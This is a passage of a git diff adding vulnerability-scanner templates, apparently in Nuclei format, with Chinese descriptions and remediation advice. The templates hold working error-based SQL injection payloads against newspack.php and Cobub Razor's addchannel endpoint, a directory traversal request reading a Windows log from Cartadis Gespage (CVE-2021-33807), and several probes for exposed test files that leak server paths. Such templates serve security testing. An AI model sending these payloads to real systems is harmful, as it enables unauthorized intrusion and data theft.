+ 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,"202cb962ac59075b964b07152d234b70")
+ raw:
+ - |
+ GET /newspack.php?issue=12%20and%20(select%204386%20from(select%20count(*)%2cconcat(md5(123)%2c(select%20(elt(4386%3d4386%2c1)))%2c0x716b7a6271%2cfloor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a) HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cartadis Cartadis Gespage/CVE-2021-33807.yaml b/config/51pwn/yaml/cartadis Cartadis Gespage/CVE-2021-33807.yaml
new file mode 100755
index 000000000..d2faebd2c
--- /dev/null
+++ b/config/51pwn/yaml/cartadis Cartadis Gespage/CVE-2021-33807.yaml
@@ -0,0 +1,50 @@
+id: CVE-2021-33807
+info:
+ name: Cartadis Gespage 8.2.1 - Directory Traversal
+ author:
+ - daffainfo
+ tags:
+ - cve
+ - cve2021
+ - lfi
+ - gespage
+ description: |2-
+ Cartadis Gespage 路径遍历漏洞
+ cartadis Cartadis Gespage是cartadis公司的一个应用软件。一个打印管理软件,它包括打印记帐、打印机监控、用户管理、支付、配额和重定向规则等功能,以实现对副本和打印的完整管理。
+
+ Cartadis Gespage存在路径遍历漏洞,该漏洞源于Cartadis Gespage允许在 gespage/doDownloadData 和 gespage/webapp/doDownloadData 中进行目录遍历
+ reference:
+ - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-33807
+ - https://www.gespage.com/cartadis-db/
+ - https://www.cartadis.com/gespage-website/
+ severity: high
+ classification:
+ cve-id:
+ - cve-2021-33807
+ cwe-id:
+ - cwe-22
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:https://support.gespage.com/fr/support/solutions/articles/14000130201-security-advisory-gespage-directory-traversal\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n
+ \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n
+ \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options
+ Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。
+ \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。\n"
+requests:
+- matchers:
+ - type: word
+ part: body
+ words:
+ - 'NetpDoDomainJoin:'
+ - type: word
+ part: header
+ words:
+ - application/octet-stream
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log'
+ method: GET
diff --git a/config/51pwn/yaml/cobubrazor/CNVD-2018-06472-1.yaml b/config/51pwn/yaml/cobubrazor/CNVD-2018-06472-1.yaml
new file mode 100755
index 000000000..dc8887731
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/CNVD-2018-06472-1.yaml
@@ -0,0 +1,38 @@
+id: CNVD-2018-06472-1
+info:
+ name: cobubrazor_v8_index.php_platform参数_sql注入
+ author:
+ - jim2g
+ description: |-
+ cobubrazor_v8_index.php_platform参数_sql注入
+ Western Bridge Cobub Razor是一套开源的移动应用程序分析系统。该系统能够为用户提供详细的多维度报告并监控其移动应用和应用程序用户行为的统计数据。
+
+ Western Bridge Cobub Razor 0.8.0版本中存在SQL注入漏洞。远程攻击者可借助/index.php?/manage/channel/addchannel请求中的‘channel_name’或‘platform’参数利用该漏洞获取信息。
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ http://www.cobub.com/cobub-razor/
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==500
+ - contains(body,'202cb962ac59075b964b07152d234b701')
+ raw:
+ - |
+ POST /razor/index.php?/manage/channel/addchannel HTTP/1.1
+ Host: {{Hostname}}
+
+ channel_name=testn&platform=" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(md5(123),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/CNVD-2018-06472.yaml b/config/51pwn/yaml/cobubrazor/CNVD-2018-06472.yaml
new file mode 100755
index 000000000..8daf3d730
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/CNVD-2018-06472.yaml
@@ -0,0 +1,36 @@
+id: CNVD-2018-06472
+info:
+ name: cobubrazor_v8_index.php_channel_name参数_sql注入
+ author:
+ - jim2g
+ description: "cobubrazor_v8_index.php_channel_name参数_sql注入\nWestern Bridge Cobub
+ Razor是一套开源的移动应用程序分析系统。该系统能够为用户提供详细的多维度报告并监控其移动应用和应用程序用户行为的统计数据。\n\nWestern Bridge
+ Cobub Razor 0.8.0版本中存在SQL注入漏洞。远程攻击者可借助/index.php?/manage/channel/addchannel请求中的‘channel_name’或‘platform’参数利用该漏洞获取信息。 "
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ http://www.cobub.com/cobub-razor/
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==500
+ - contains(body,'202cb962ac59075b964b07152d234b701')
+ raw:
+ - |
+ POST /razor/index.php?/manage/channel/addchannel HTTP/1.1
+ Host: {{Hostname}}
+
+ channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(md5(123),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-generate-info.yaml b/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-generate-info.yaml
new file mode 100755
index 000000000..29e0361d4
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-generate-info.yaml
@@ -0,0 +1,35 @@
+id: Ccobubrazor_v8-generate-info
+info:
+ name: cobubrazor_generate.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_generate.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://c4j.cn/
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ raw:
+ - |
+ GET /razor/tests/generate.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-getConfigTest-info.yaml b/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-getConfigTest-info.yaml
new file mode 100755
index 000000000..05b2f654f
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-getConfigTest-info.yaml
@@ -0,0 +1,35 @@
+id: Ccobubrazor_v8-getConfigTest-info
+info:
+ name: cobubrazor_v8_controllers_getConfigTest.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_controllers_getConfigTest.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://c4j.cn/
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal erro')
+ raw:
+ - |
+ GET /razor/tests/controllers/getConfigTest.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt-info.yaml
new file mode 100755
index 000000000..f2acb4ba9
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-Controller_fixt-info
+info:
+ name: cobubrazor_v8_tests_fixtures_Controller_fixt.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_fixtures_Controller_fixt.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ http://www.cobub.com/cobub-razor/
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/fixtures/Controller_fixt.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt2-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt2-info.yaml
new file mode 100755
index 000000000..c28a7c2e2
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt2-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-Controller_fixt2-info
+info:
+ name: cobubrazor_v8_tests_fixtures_Controller_fixt2.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_fixtures_Controller_fixt2.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/fixtures/Controller_fixt2.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-commonDbfix-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-commonDbfix-info.yaml
new file mode 100755
index 000000000..2f228ceab
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-commonDbfix-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-commonDbfix-info
+info:
+ name: cobubrazor_v8_tests_models_commonDbfix.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_models_commonDbfix.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ http://www.cobub.com/cobub-razor
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/models/commonDbfix.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-getUpdateTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-getUpdateTest-info.yaml
new file mode 100755
index 000000000..3de0b59a8
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-getUpdateTest-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-getUpdateTest-info
+info:
+ name: cobubrazor_v8_tests_controllers/getUpdateTest.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_controllers/getUpdateTest.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/controllers/getUpdateTest.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-ipTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-ipTest-info.yaml
new file mode 100755
index 000000000..fd8ee831a
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-ipTest-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-ipTest-info
+info:
+ name: cobubrazor_v8_tests_libs_ipTest.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_libs_ipTest.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ http://www.cobub.com/cobub-razor/
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/libs/ipTest.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postclientdataTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postclientdataTest-info.yaml
new file mode 100755
index 000000000..a2d4db58c
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postclientdataTest-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-postclientdataTest-info
+info:
+ name: cobubrazor_v8_tests_controllers_postclientdataTest.php_信息泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_controllers_postclientdataTest.php_信息泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/controllers/postclientdataTest.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posterrorTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posterrorTest-info.yaml
new file mode 100755
index 000000000..ec723adcf
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posterrorTest-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-posterrorTest-info
+info:
+ name: cobubrazor_v8_tests_controllers_posterrorTest.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_controllers_posterrorTest.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://c4j.cn/
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/controllers/posterrorTest.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posteventTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posteventTest-info.yaml
new file mode 100755
index 000000000..06fb89f54
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posteventTest-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-posteventTest-info
+info:
+ name: cobubrazor_v8_tests_controllers_posteventTest.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_controllers_posteventTest.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ http://www.cobub.com/cobub-razor/
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
